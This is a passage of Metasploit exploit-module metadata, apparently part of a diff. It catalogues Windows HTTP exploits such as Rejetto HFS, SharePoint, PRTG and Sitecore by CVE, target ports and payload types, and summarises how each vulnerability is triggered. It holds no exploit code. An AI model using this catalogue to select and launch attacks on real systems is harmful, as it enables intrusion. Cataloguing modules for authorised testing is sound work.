"ref_name": "windows/http/prtg_authenticated_rce", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "screen-effects", - "config-changes", - "ioc-in-logs" - ], - "Reliability": [ - "repeatable-session" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/prtg_authenticated_rce_cve_2023_32781": { - "name": "PRTG CVE-2023-32781 Authenticated RCE", - "fullname": "exploit/windows/http/prtg_authenticated_rce_cve_2023_32781", - "aliases": [], - "rank": 600, - "disclosure_date": "2023-08-09", - "type": "exploit", - "author": [ - "Kevin Joensen " - ], - "description": "Authenticated RCE in Paessler PRTG", - "references": [ - "URL-https://baldur.dk/blog/prtg-rce.html", - "CVE-2023-32781" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows_Fetch", - "Windows_CMDStager" - ], - "mod_time": "2024-01-22 10:10:14 +0000", - "path": "/modules/exploits/windows/http/prtg_authenticated_rce_cve_2023_32781.rb", - "is_install_path": true, - "ref_name": "windows/http/prtg_authenticated_rce_cve_2023_32781", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "artifacts-on-disk", - "ioc-in-logs" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/psoproxy91_overflow": { - "name": "PSO Proxy v0.91 Stack Buffer Overflow", - "fullname": "exploit/windows/http/psoproxy91_overflow", - "aliases": [], - "rank": 200, - "disclosure_date": "2004-02-20", - "type": "exploit", - "author": [ - "aushack " - ], - "description": "This module exploits a buffer overflow in the PSO Proxy v0.91 web server.\n If a client sends an excessively long string the stack is overwritten.", - "references": [ - "CVE-2004-0313", - "OSVDB-4028", - "EDB-156", - "BID-9706" - ], - "platform": "Windows", - "arch": "", - "rport": 8080, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Windows 2000 Pro SP0-4 English", - "Windows 2000 Pro SP0-4 French", - "Windows 2000 Pro SP0-4 Italian", - "Windows XP Pro SP0/1 English", - "Windows XP Pro SP2 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/psoproxy91_overflow.rb", - "is_install_path": true, - "ref_name": "windows/http/psoproxy91_overflow", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/rabidhamster_r4_log": { - "name": "RabidHamster R4 Log Entry sprintf() Buffer Overflow", - "fullname": "exploit/windows/http/rabidhamster_r4_log", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-02-09", - "type": "exploit", - "author": [ - "Luigi Auriemma", - "sinn3r " - ], - "description": "This module exploits a vulnerability found in RabidHamster R4's web server.\n By supplying a malformed HTTP request, it is possible to trigger a stack-based\n buffer overflow when generating a log, which may result in arbitrary code\n execution under the context of the user.", - "references": [ - "OSVDB-79007", - "URL-http://aluigi.altervista.org/adv/r4_1-adv.txt" - ], - "platform": "Windows", - "arch": "", - "rport": 8888, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "R4 v1.25" - ], - "mod_time": "2023-03-23 10:19:30 +0000", - "path": "/modules/exploits/windows/http/rabidhamster_r4_log.rb", - "is_install_path": true, - "ref_name": "windows/http/rabidhamster_r4_log", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/rejetto_hfs_exec": { - "name": "Rejetto HttpFileServer Remote Command Execution", - "fullname": "exploit/windows/http/rejetto_hfs_exec", - "aliases": [], - "rank": 600, - "disclosure_date": "2014-09-11", - "type": "exploit", - "author": [ - "Daniele Linguaglossa ", - "Muhamad Fadzil Ramli " - ], - "description": "Rejetto HttpFileServer (HFS) is vulnerable to remote command execution attack due to a\n poor regex in the file ParserLib.pas. This module exploits the HFS scripting commands by\n using '%00' to bypass the filtering. This module has been tested successfully on HFS 2.3b\n over Windows XP SP3, Windows 7 SP1 and Windows 8.", - "references": [ - "CVE-2014-6287", - "OSVDB-111386", - "URL-https://seclists.org/bugtraq/2014/Sep/85", - "URL-http://www.rejetto.com/wiki/index.php?title=HFS:_scripting_commands" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic" - ], - "mod_time": "2021-05-09 12:40:48 +0000", - "path": "/modules/exploits/windows/http/rejetto_hfs_exec.rb", - "is_install_path": true, - "ref_name": "windows/http/rejetto_hfs_exec", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/http/rejetto_hfs_rce_cve_2024_23692": { - "name": "Rejetto HTTP File Server (HFS) Unauthenticated Remote Code Execution", - "fullname": "exploit/windows/http/rejetto_hfs_rce_cve_2024_23692", - "aliases": [], - "rank": 600, - "disclosure_date": "2024-05-25", - "type": "exploit", - "author": [ - "sfewer-r7", - "Arseniy Sharoglazov" - ], - "description": "The Rejetto HTTP File Server (HFS) version 2.x is vulnerable to an unauthenticated server side template\n injection (SSTI) vulnerability. A remote unauthenticated attacker can execute code with the privileges\n of the user account running the HFS.exe server process. This exploit has been tested to work against version\n 2.4.0 RC7 and 2.3m. The Rejetto HTTP File Server (HFS) version 2.x is no longer supported by the maintainers\n and no patch is available. Users are recommended to upgrade to newer supported versions.", - "references": [ - "CVE-2024-23692", - "URL-https://mohemiv.com/all/rejetto-http-file-server-2-3m-unauthenticated-rce/" - ], - "platform": "Windows", - "arch": "cmd", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic" - ], - "mod_time": "2024-06-11 16:26:04 +0000", - "path": "/modules/exploits/windows/http/rejetto_hfs_rce_cve_2024_23692.rb", - "is_install_path": true, - "ref_name": "windows/http/rejetto_hfs_rce_cve_2024_23692", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "ioc-in-logs", - "screen-effects" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/sambar6_search_results": { - "name": "Sambar 6 Search Results Buffer Overflow", - "fullname": "exploit/windows/http/sambar6_search_results", - "aliases": [], - "rank": 300, - "disclosure_date": "2003-06-21", - "type": "exploit", - "author": [ - "hdm ", - "Andrew Griffiths ", - "aushack " - ], - "description": "This module exploits a buffer overflow found in the\n /search/results.stm application that comes with Sambar 6.\n This code is a direct port of Andrew Griffiths's SMUDGE\n exploit, the only changes made were to the nops and payload.\n This exploit causes the service to die, whether you provided\n the correct target or not.", - "references": [ - "CVE-2004-2086", - "OSVDB-5786", - "BID-9607" - ], - "platform": "Windows", - "arch": "x86", - "rport": 80, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Windows 2000", - "Windows XP" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/sambar6_search_results.rb", - "is_install_path": true, - "ref_name": "windows/http/sambar6_search_results", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/sap_configservlet_exec_noauth": { - "name": "SAP ConfigServlet Remote Code Execution", - "fullname": "exploit/windows/http/sap_configservlet_exec_noauth", - "aliases": [], - "rank": 500, - "disclosure_date": "2012-11-01", - "type": "exploit", - "author": [ - "Dmitry Chastuhin", - "Andras Kabai" - ], - "description": "This module allows remote code execution via operating system commands through the\n SAP ConfigServlet without any authentication. This module has been tested successfully\n with SAP NetWeaver 7.00 and 7.01 on Windows Server 2008 R2.", - "references": [ - "OSVDB-92704", - "EDB-24996", - "URL-http://erpscan.com/wp-content/uploads/2012/11/Breaking-SAP-Portal-HackerHalted-2012.pdf" - ], - "platform": "Windows", - "arch": "", - "rport": 50000, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows generic" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/sap_configservlet_exec_noauth.rb", - "is_install_path": true, - "ref_name": "windows/http/sap_configservlet_exec_noauth", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/http/sap_host_control_cmd_exec": { - "name": "SAP NetWeaver HostControl Command Injection", - "fullname": "exploit/windows/http/sap_host_control_cmd_exec", - "aliases": [], - "rank": 200, - "disclosure_date": "2012-08-14", - "type": "exploit", - "author": [ - "Michael Jordon", - "juan vazquez " - ], - "description": "This module exploits a command injection vulnerability in the SAPHostControl\n Service, by sending a specially crafted SOAP request to the management console.\n\n In order to deal with the spaces and length limitations, a WebDAV service is\n created to run an arbitrary payload when accessed as a UNC path. Because of this,\n the target host must have the WebClient service (WebDAV Mini-Redirector) enabled.\n It is enabled and automatically started by default on Windows XP SP3, but disabled\n by default on Windows 2003 SP2.", - "references": [ - "OSVDB-84821", - "URL-http://www.contextis.com/research/blog/sap4/", - "URL-https://websmp130.sap-ag.de/sap/support/notes/1341333" - ], - "platform": "Windows", - "arch": "", - "rport": 1128, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "SAP NetWeaver 7.02 SP6 / Windows with WebClient enabled" - ], - "mod_time": "2017-07-24 06:26:21 +0000", - "path": "/modules/exploits/windows/http/sap_host_control_cmd_exec.rb", - "is_install_path": true, - "ref_name": "windows/http/sap_host_control_cmd_exec", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/sapdb_webtools": { - "name": "SAP DB 7.4 WebTools Buffer Overflow", - "fullname": "exploit/windows/http/sapdb_webtools", - "aliases": [], - "rank": 500, - "disclosure_date": "2007-07-05", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in SAP DB 7.4 WebTools.\n By sending an overly long GET request, it may be possible for\n an attacker to execute arbitrary code.", - "references": [ - "CVE-2007-3614", - "OSVDB-37838", - "BID-24773" - ], - "platform": "Windows", - "arch": "", - "rport": 9999, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "SAP DB 7.4 WebTools" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/sapdb_webtools.rb", - "is_install_path": true, - "ref_name": "windows/http/sapdb_webtools", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/savant_31_overflow": { - "name": "Savant 3.1 Web Server Overflow", - "fullname": "exploit/windows/http/savant_31_overflow", - "aliases": [], - "rank": 500, - "disclosure_date": "2002-09-10", - "type": "exploit", - "author": [ - "aushack " - ], - "description": "This module exploits a stack buffer overflow in Savant 3.1 Web Server. The service\n supports a maximum of 10 threads (for a default install). Each exploit attempt\n generally causes a thread to die whether successful or not. Therefore, in a default\n configuration, you only have 10 chances.\n\n Due to the limited space available for the payload in this exploit module, use of the\n \"ord\" payloads is recommended.", - "references": [ - "CVE-2002-1120", - "OSVDB-9829", - "BID-5686", - "EDB-787" - ], - "platform": "Windows", - "arch": "x86", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Universal Savant.exe", - "Windows 2000 Pro All - English", - "Windows 2000 Pro All - Italian", - "Windows 2000 Pro All - French", - "Windows XP Pro SP2 - English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/savant_31_overflow.rb", - "is_install_path": true, - "ref_name": "windows/http/savant_31_overflow", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/sepm_auth_bypass_rce": { - "name": "Symantec Endpoint Protection Manager Authentication Bypass and Code Execution", - "fullname": "exploit/windows/http/sepm_auth_bypass_rce", - "aliases": [], - "rank": 600, - "disclosure_date": "2015-07-31", - "type": "exploit", - "author": [ - "Markus Wulftange", - "bperry" - ], - "description": "This module exploits three separate vulnerabilities in Symantec Endpoint Protection Manager\n in order to achieve a remote shell on the box as NT AUTHORITY\\SYSTEM. The vulnerabilities\n include an authentication bypass, a directory traversal and a privilege escalation to\n get privileged code execution.", - "references": [ - "CVE-2015-1486", - "CVE-2015-1487", - "CVE-2015-1489", - "URL-http://codewhitesec.blogspot.com/2015/07/symantec-endpoint-protection.html" - ], - "platform": "Windows", - "arch": "", - "rport": 8443, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/sepm_auth_bypass_rce.rb", - "is_install_path": true, - "ref_name": "windows/http/sepm_auth_bypass_rce", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/http/serviio_checkstreamurl_cmd_exec": { - "name": "Serviio Media Server checkStreamUrl Command Execution", - "fullname": "exploit/windows/http/serviio_checkstreamurl_cmd_exec", - "aliases": [], - "rank": 600, - "disclosure_date": "2017-05-03", - "type": "exploit", - "author": [ - "Gjoko Krstic(LiquidWorm) ", - "bcoles " - ], - "description": "This module exploits an unauthenticated remote command execution vulnerability\n in the console component of Serviio Media Server versions 1.4 to 1.8 on\n Windows operating systems.\n\n The console service (on port 23423 by default) exposes a REST API which\n which does not require authentication.\n\n The 'action' API endpoint does not sufficiently sanitize user-supplied data\n in the 'VIDEO' parameter of the 'checkStreamUrl' method. This parameter is\n used in a call to cmd.exe resulting in execution of arbitrary commands.\n\n This module has been tested successfully on Serviio Media Server versions\n 1.4.0, 1.5.0, 1.6.0 and 1.8.0 on Windows 7.", - "references": [ - "OSVDB-41961", - "PACKETSTORM-142387", - "URL-http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5408.php", - "URL-https://blogs.securiteam.com/index.php/archives/3094" - ], - "platform": "Windows", - "arch": "", - "rport": 23423, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic Targeting" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/serviio_checkstreamurl_cmd_exec.rb", - "is_install_path": true, - "ref_name": "windows/http/serviio_checkstreamurl_cmd_exec", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/servu_session_cookie": { - "name": "Rhinosoft Serv-U Session Cookie Buffer Overflow", - "fullname": "exploit/windows/http/servu_session_cookie", - "aliases": [], - "rank": 400, - "disclosure_date": "2009-11-01", - "type": "exploit", - "author": [ - "Nikolas Rangos ", - "M.Yanagishita ", - "jduck " - ], - "description": "This module exploits a buffer overflow in Rhinosoft Serv-U 9.0.0.5.\n Sending a specially crafted POST request with an overly long session cookie\n string, an attacker may be able to execute arbitrary code.", - "references": [ - "CVE-2009-4006", - "OSVDB-59772", - "URL-http://rangos.de/ServU-ADV.txt" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 2003 SP2 English (NX)", - "Windows 2000 SP4 and XP SP3 English (SEH)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/servu_session_cookie.rb", - "is_install_path": true, - "ref_name": "windows/http/servu_session_cookie", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/sharepoint_data_deserialization": { - "name": "SharePoint DataSet / DataTable Deserialization", - "fullname": "exploit/windows/http/sharepoint_data_deserialization", - "aliases": [], - "rank": 600, - "disclosure_date": "2020-07-14", - "type": "exploit", - "author": [ - "Steven Seeley", - "Soroush Dalili", - "Spencer McIntyre" - ], - "description": "A remotely exploitable vulnerability exists within SharePoint that can be leveraged by a remote authenticated\n attacker to execute code within the context of the SharePoint application service. The privileges in this\n execution context are determined by the account that is specified when SharePoint is installed and configured.\n The vulnerability is related to a failure to validate the source of XML input data, leading to an unsafe\n deserialization operation that can be triggered from a page that initializes either the\n ContactLinksSuggestionsMicroView type or a derivative of it. In a default configuration, a Domain User account\n is sufficient to access SharePoint and exploit this vulnerability.", - "references": [ - "CVE-2020-1147", - "URL-https://srcincite.io/blog/2020/07/20/sharepoint-and-pwn-remote-code-execution-against-sharepoint-server-abusing-dataset.html" - ], - "platform": "Windows", - "arch": "", - "rport": 443, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows EXE Dropper", - "Windows Command", - "Windows Powershell" - ], - "mod_time": "2021-08-27 17:15:33 +0000", - "path": "/modules/exploits/windows/http/sharepoint_data_deserialization.rb", - "is_install_path": true, - "ref_name": "windows/http/sharepoint_data_deserialization", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "artifacts-on-disk", - "ioc-in-logs" - ], - "Reliability": [ - "repeatable-session" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/sharepoint_dynamic_proxy_generator_auth_bypass_rce": { - "name": "Sharepoint Dynamic Proxy Generator Unauth RCE", - "fullname": "exploit/windows/http/sharepoint_dynamic_proxy_generator_auth_bypass_rce", - "aliases": [], - "rank": 600, - "disclosure_date": "2023-05-01", - "type": "exploit", - "author": [ - "Jang", - "jheysel-r7" - ], - "description": "This module exploits two vulnerabilities in Sharepoint 2019, an auth bypass CVE-2023-29357 which was patched\n in June of 2023 and CVE-2023-24955, an RCE which was patched in May of 2023.\n\n The auth bypass allows attackers to impersonate the Sharepoint Admin user. This vulnerability stems from the\n signature validation check used to verify JSON Web Tokens (JWTs) used for OAuth authentication. If the signing\n algorithm of the user-provided JWT is set to none, SharePoint skips the signature validation step due to a logic\n flaw in the ReadTokenCore() method.\n\n After impersonating the administrator user, the attacker has access to the Sharepoint API and is able to\n exploit CVE-2023-24955. This authenticated RCE vulnerability leverages the impersonated privileged account to\n replace the \"/BusinessDataMetadataCatalog/BDCMetadata.bdcm\" file in the webroot directory with a payload. The\n payload is then compiled and executed by Sharepoint allowing attackers to remotely execute commands via the API.", - "references": [ - "URL-https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-sharepoint-server-2019-may-9-2023-kb5002389-e2b77a46-2946-495f-8948-8abdc44aacc3", - "URL-https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-sharepoint-server-2019-june-13-2023-kb5002402-c5d58925-f7be-4d16-a61b-8ce871bbe34d", - "URL-https://testbnull.medium.com/p2o-vancouver-2023-v%C3%A0i-d%C3%B2ng-v%E1%BB%81-sharepoint-pre-auth-rce-chain-cve-2023-29357-cve-2023-24955-ed97dcab131e", - "CVE-2023-29357", - "CVE-2023-24955" - ], - "platform": "Windows", - "arch": "cmd", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows Command" - ], - "mod_time": "2024-02-15 09:26:54 +0000", - "path": "/modules/exploits/windows/http/sharepoint_dynamic_proxy_generator_auth_bypass_rce.rb", - "is_install_path": true, - "ref_name": "windows/http/sharepoint_dynamic_proxy_generator_auth_bypass_rce", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "artifacts-on-disk" - ], - "Reliability": [ - "repeatable-session" - ] - }, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/http/sharepoint_ssi_viewstate": { - "name": "Microsoft SharePoint Server-Side Include and ViewState RCE", - "fullname": "exploit/windows/http/sharepoint_ssi_viewstate", - "aliases": [], - "rank": 600, - "disclosure_date": "2020-10-13", - "type": "exploit", - "author": [ - "mr_me", - "wvu " - ], - "description": "This module exploits a server-side include (SSI) in SharePoint to leak\n the web.config file and forge a malicious ViewState with the extracted\n validation key.\n\n This exploit is authenticated and requires a user with page creation\n privileges, which is a standard permission in SharePoint.\n\n The web.config file will be stored in loot once retrieved, and the\n VALIDATION_KEY option can be set to short-circuit the SSI and trigger\n the ViewState deserialization.\n\n Tested against SharePoint 2019 on Windows Server 2016.", - "references": [ - "CVE-2020-16952", - "URL-https://srcincite.io/advisories/src-2020-0022/", - "URL-https://srcincite.io/pocs/cve-2020-16952.py.txt", - "URL-https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16952" - ], - "platform": "Windows", - "arch": "cmd, x86, x64", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows Command", - "Windows Dropper", - "PowerShell Stager" - ], - "mod_time": "2024-07-24 16:42:43 +0000", - "path": "/modules/exploits/windows/http/sharepoint_ssi_viewstate.rb", - "is_install_path": true, - "ref_name": "windows/http/sharepoint_ssi_viewstate", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "unreliable-session" - ], - "SideEffects": [ - "ioc-in-logs", - "config-changes", - "artifacts-on-disk" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/sharepoint_unsafe_control": { - "name": "Microsoft SharePoint Unsafe Control and ViewState RCE", - "fullname": "exploit/windows/http/sharepoint_unsafe_control", - "aliases": [], - "rank": 600, - "disclosure_date": "2021-05-11", - "type": "exploit", - "author": [ - "Unknown", - "Spencer McIntyre", - "wvu " - ], - "description": "The EditingPageParser.VerifyControlOnSafeList method fails to properly validate user supplied data. This\n can be leveraged by an attacker to leak sensitive information in rendered-preview content. This module will\n leak the ViewState validation key and then use it to sign a crafted object that will trigger code execution\n when deserialized.\n\n Tested against SharePoint 2019 and SharePoint 2016, both on Windows Server 2016.", - "references": [ - "CVE-2021-31181", - "ZDI-21-573", - "URL-https://www.zerodayinitiative.com/blog/2021/6/1/cve-2021-31181-microsoft-sharepoint-webpart-interpretation-conflict-remote-code-execution-vulnerability" - ], - "platform": "Windows", - "arch": "cmd, x86, x64", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows Command", - "Windows Dropper", - "PowerShell Stager" - ], - "mod_time": "2024-07-24 16:42:43 +0000", - "path": "/modules/exploits/windows/http/sharepoint_unsafe_control.rb", - "is_install_path": true, - "ref_name": "windows/http/sharepoint_unsafe_control", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "ioc-in-logs", - "artifacts-on-disk" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/sharepoint_workflows_xoml": { - "name": "SharePoint Workflows XOML Injection", - "fullname": "exploit/windows/http/sharepoint_workflows_xoml", - "aliases": [], - "rank": 600, - "disclosure_date": "2020-03-02", - "type": "exploit", - "author": [ - "Spencer McIntyre", - "Soroush Dalili" - ], - "description": "This module exploits a vulnerability within SharePoint and its .NET backend\n that allows an attacker to execute commands using specially crafted XOML data\n sent to SharePoint via the Workflows functionality.", - "references": [ - "CVE-2020-0646", - "URL-https://www.mdsec.co.uk/2020/01/code-injection-in-workflows-leading-to-sharepoint-rce-cve-2020-0646/" - ], - "platform": "Windows", - "arch": "", - "rport": 443, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows EXE Dropper", - "Windows Command", - "Windows Powershell" - ], - "mod_time": "2023-02-08 15:20:32 +0000", - "path": "/modules/exploits/windows/http/sharepoint_workflows_xoml.rb", - "is_install_path": true, - "ref_name": "windows/http/sharepoint_workflows_xoml", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "artifacts-on-disk", - "ioc-in-logs" - ], - "Reliability": [ - "repeatable-session" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/shoutcast_format": { - "name": "SHOUTcast DNAS/win32 1.9.4 File Request Format String Overflow", - "fullname": "exploit/windows/http/shoutcast_format", - "aliases": [], - "rank": 200, - "disclosure_date": "2004-12-23", - "type": "exploit", - "author": [ - "MC ", - "mandragore " - ], - "description": "This module exploits a format string vulnerability in the\n Nullsoft SHOUTcast server for Windows. The vulnerability is\n triggered by requesting a file path that contains format\n string specifiers. This vulnerability was discovered by\n Tomasz Trojanowski and Damian Put.", - "references": [ - "CVE-2004-1373", - "OSVDB-12585", - "BID-12096" - ], - "platform": "Windows", - "arch": "", - "rport": 8000, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic", - "Windows NT SP5/SP6a English", - "Windows 2000 English ALL", - "Windows XP Pro SP0/SP1 English", - "Windows 2003 Server English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/shoutcast_format.rb", - "is_install_path": true, - "ref_name": "windows/http/shoutcast_format", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/shttpd_post": { - "name": "SHTTPD URI-Encoded POST Request Overflow", - "fullname": "exploit/windows/http/shttpd_post", - "aliases": [], - "rank": 200, - "disclosure_date": "2006-10-06", - "type": "exploit", - "author": [ - "LMH ", - "hdm ", - "skOd" - ], - "description": "This module exploits a stack buffer overflow in SHTTPD <= 1.34.\n The vulnerability is caused due to a boundary error within the\n handling of POST requests. Based on an original exploit by skOd\n but using a different method found by hdm.", - "references": [ - "CVE-2006-5216", - "OSVDB-29565", - "URL-http://shttpd.sourceforge.net", - "BID-20393" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Windows NT English SP5-SP6", - "Windows 2000 Spanish SP4", - "Windows 2000 French SP4", - "Windows 2000 English SP0-SP4", - "Windows 2000 French SP0-SP4", - "Windows 2003 Server English SP0-SP1", - "Windows XP German SP2", - "Windows XP German SP1", - "Windows XP English SP2", - "Windows XP English SP0-SP1" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/shttpd_post.rb", - "is_install_path": true, - "ref_name": "windows/http/shttpd_post", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/sitecore_xp_cve_2021_42237": { - "name": "Sitecore Experience Platform (XP) PreAuth Deserialization RCE", - "fullname": "exploit/windows/http/sitecore_xp_cve_2021_42237", - "aliases": [], - "rank": 600, - "disclosure_date": "2021-11-02", - "type": "exploit", - "author": [ - "AssetNote", - "gwillcox-r7" - ], - "description": "This module exploits a deserialization vulnerability in the Report.ashx page\n of Sitecore XP 7.5 to 7.5.2, 8.0 to 8.0.7, 8.1 to 8.1.3, and 8.2 to 8.2.7.\n Versions 7.2.6 and earlier and 9.0 and later are not affected.\n\n The vulnerability occurs due to Report.ashx's handler, located in Sitecore.Xdb.Client.dll\n under the Sitecore.sitecore.shell.ClientBin.Reporting.Report defintion, having a ProcessRequest()\n handler that calls ProcessReport() with the context of the attacker's request without properly\n checking if the attacker is authenticated or not.\n\n This request then causes ReportDataSerializer.DeserializeQuery() to be called, which will\n end up calling the DeserializeParameters() function of\n Sitecore.Analytics.Reporting.ReportDataSerializer, if a \"parameters\" XML tag is found in\n the attacker's request.\n\n Then for each subelement named \"parameter\", the code will check that it has a name and\n if it does, it will call NetDataContractSerializer().ReadObject on it. NetDataContractSerializer is\n vulnerable to deserialization attacks and can be trivially exploited by using the\n TypeConfuseDelegate gadget chain.\n\n By exploiting this vulnerability, an attacker can gain arbitrary code execution as the user\n that IIS is running as, aka NT AUTHORITY\\NETWORK SERVICE. Users can then use technique 4\n of the \"getsystem\" command to use RPCSS impersonation and get SYSTEM level code execution.", - "references": [ - "CVE-2021-42237", - "URL-https://blog.assetnote.io/2021/11/02/sitecore-rce/", - "URL-https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1000776" - ], - "platform": "Windows", - "arch": "cmd, x86, x64", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 